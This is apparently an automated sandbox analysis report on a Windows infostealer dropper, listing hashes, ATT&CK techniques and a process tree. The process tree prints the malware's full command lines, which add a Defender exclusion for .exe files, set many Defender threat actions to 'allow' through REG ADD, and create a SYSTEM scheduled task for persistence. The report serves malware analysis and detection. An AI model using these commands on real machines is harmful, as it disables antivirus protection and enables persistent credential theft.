4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa

General

Target

4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe
Size

6.4MB
MD5

43798253e6d8bf646957078c091972b6
SHA1

da192fc0d684717cf872dce47a2c06d718f2836e
SHA256

4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa
SHA512

51a6076d714c5a6548a9c75cecb554e1322f0d00b1c6595f5fd987ad3bd8af459f02a2ef55c649fa9a8635a2cd8b24588f712d4ba020a2aa4bc2217bf4e6cbe1
SSDEEP

196608:91OU2zjVpYD8vDwJmaHxbS2Os9qP0eE7xx:3OU2tpRvDqRbhOZ0f7xx

Score

7^/10

spyware stealer

Malware Config

Signatures

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Executes dropped EXE 2 IoCs

Processes:

Install.exeqaqZTAw.exe

pid process

3148 Install.exe
3628 qaqZTAw.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bwrroZoeZRoQVpyAcj.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

864 schtasks.exe
4056 schtasks.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
3148	Install.exe
3628	qaqZTAw.exe

description	ioc	process
File created	C:\Windows\Tasks\bwrroZoeZRoQVpyAcj.job	schtasks.exe

pid	process
864	schtasks.exe
4056	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 42 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

3676 powershell.exe
3676 powershell.exe
3676 powershell.exe
1840 powershell.exe
1840 powershell.exe
1840 powershell.exe

pid	process
3676	powershell.exe
3676	powershell.exe
3676	powershell.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

powershell.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeIncreaseQuotaPrivilege	628	WMIC.exe
Token: SeSecurityPrivilege	628	WMIC.exe
Token: SeTakeOwnershipPrivilege	628	WMIC.exe
Token: SeLoadDriverPrivilege	628	WMIC.exe
Token: SeSystemProfilePrivilege	628	WMIC.exe
Token: SeSystemtimePrivilege	628	WMIC.exe
Token: SeProfSingleProcessPrivilege	628	WMIC.exe
Token: SeIncBasePriorityPrivilege	628	WMIC.exe
Token: SeCreatePagefilePrivilege	628	WMIC.exe
Token: SeBackupPrivilege	628	WMIC.exe
Token: SeRestorePrivilege	628	WMIC.exe
Token: SeShutdownPrivilege	628	WMIC.exe
Token: SeDebugPrivilege	628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	628	WMIC.exe
Token: SeRemoteShutdownPrivilege	628	WMIC.exe
Token: SeUndockPrivilege	628	WMIC.exe
Token: SeManageVolumePrivilege	628	WMIC.exe
Token: 33	628	WMIC.exe
Token: 34	628	WMIC.exe
Token: 35	628	WMIC.exe
Token: 36	628	WMIC.exe
Token: SeIncreaseQuotaPrivilege	628	WMIC.exe
Token: SeSecurityPrivilege	628	WMIC.exe
Token: SeTakeOwnershipPrivilege	628	WMIC.exe
Token: SeLoadDriverPrivilege	628	WMIC.exe
Token: SeSystemProfilePrivilege	628	WMIC.exe
Token: SeSystemtimePrivilege	628	WMIC.exe
Token: SeProfSingleProcessPrivilege	628	WMIC.exe
Token: SeIncBasePriorityPrivilege	628	WMIC.exe
Token: SeCreatePagefilePrivilege	628	WMIC.exe
Token: SeBackupPrivilege	628	WMIC.exe
Token: SeRestorePrivilege	628	WMIC.exe
Token: SeShutdownPrivilege	628	WMIC.exe
Token: SeDebugPrivilege	628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	628	WMIC.exe
Token: SeRemoteShutdownPrivilege	628	WMIC.exe
Token: SeUndockPrivilege	628	WMIC.exe
Token: SeManageVolumePrivilege	628	WMIC.exe
Token: 33	628	WMIC.exe
Token: 34	628	WMIC.exe
Token: 35	628	WMIC.exe
Token: 36	628	WMIC.exe
Token: SeDebugPrivilege	1840	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exeInstall.exeforfiles.execmd.exepowershell.exeqaqZTAw.exepowershell.execmd.exe

description	pid	process	target process
PID 4800 wrote to memory of 3148	4800	4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe	Install.exe
PID 4800 wrote to memory of 3148	4800	4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe	Install.exe
PID 4800 wrote to memory of 3148	4800	4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe	Install.exe
PID 3148 wrote to memory of 3200	3148	Install.exe	forfiles.exe
PID 3148 wrote to memory of 3200	3148	Install.exe	forfiles.exe
PID 3148 wrote to memory of 3200	3148	Install.exe	forfiles.exe
PID 3200 wrote to memory of 4864	3200	forfiles.exe	cmd.exe
PID 3200 wrote to memory of 4864	3200	forfiles.exe	cmd.exe
PID 3200 wrote to memory of 4864	3200	forfiles.exe	cmd.exe
PID 4864 wrote to memory of 3676	4864	cmd.exe	powershell.exe
PID 4864 wrote to memory of 3676	4864	cmd.exe	powershell.exe
PID 4864 wrote to memory of 3676	4864	cmd.exe	powershell.exe
PID 3676 wrote to memory of 628	3676	powershell.exe	WMIC.exe
PID 3676 wrote to memory of 628	3676	powershell.exe	WMIC.exe
PID 3676 wrote to memory of 628	3676	powershell.exe	WMIC.exe
PID 3148 wrote to memory of 864	3148	Install.exe	schtasks.exe
PID 3148 wrote to memory of 864	3148	Install.exe	schtasks.exe
PID 3148 wrote to memory of 864	3148	Install.exe	schtasks.exe
PID 3628 wrote to memory of 1840	3628	qaqZTAw.exe	powershell.exe
PID 3628 wrote to memory of 1840	3628	qaqZTAw.exe	powershell.exe
PID 3628 wrote to memory of 1840	3628	qaqZTAw.exe	powershell.exe
PID 1840 wrote to memory of 4284	1840	powershell.exe	cmd.exe
PID 1840 wrote to memory of 4284	1840	powershell.exe	cmd.exe
PID 1840 wrote to memory of 4284	1840	powershell.exe	cmd.exe
PID 4284 wrote to memory of 352	4284	cmd.exe	reg.exe
PID 4284 wrote to memory of 352	4284	cmd.exe	reg.exe
PID 4284 wrote to memory of 352	4284	cmd.exe	reg.exe
PID 1840 wrote to memory of 5012	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 5012	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 5012	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4608	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4608	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4608	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4476	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4476	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4476	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3204	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3204	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3204	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3548	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3548	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3548	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4032	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4032	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4032	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4228	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4228	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4228	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3076	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3076	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3076	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3636	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3636	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 3636	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 1816	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 1816	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 1816	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 2432	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 2432	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 2432	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 1132	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 1132	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 1132	1840	powershell.exe	reg.exe
PID 1840 wrote to memory of 4188	1840	powershell.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe
"C:\Users\Admin\AppData\Local\Temp\4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4800

C:\Users\Admin\AppData\Local\Temp\7zS5C58.tmp\Install.exe
.\Install.exe /RCQdidXww "525403" /S
2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3148

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
3⤵
- Suspicious use of WriteProcessMemory
PID:3200

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
4⤵
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 02:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\qaqZTAw.exe\" ZO /AFsite_idNzM 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:864

C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\qaqZTAw.exe
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\qaqZTAw.exe ZO /AFsite_idNzM 525403 /S
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
- Suspicious use of WriteProcessMemory
PID:4284

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:4608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:4032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:3636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:2432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:1132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:4188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4048

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1952

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:2104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:1120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:2392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:3704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
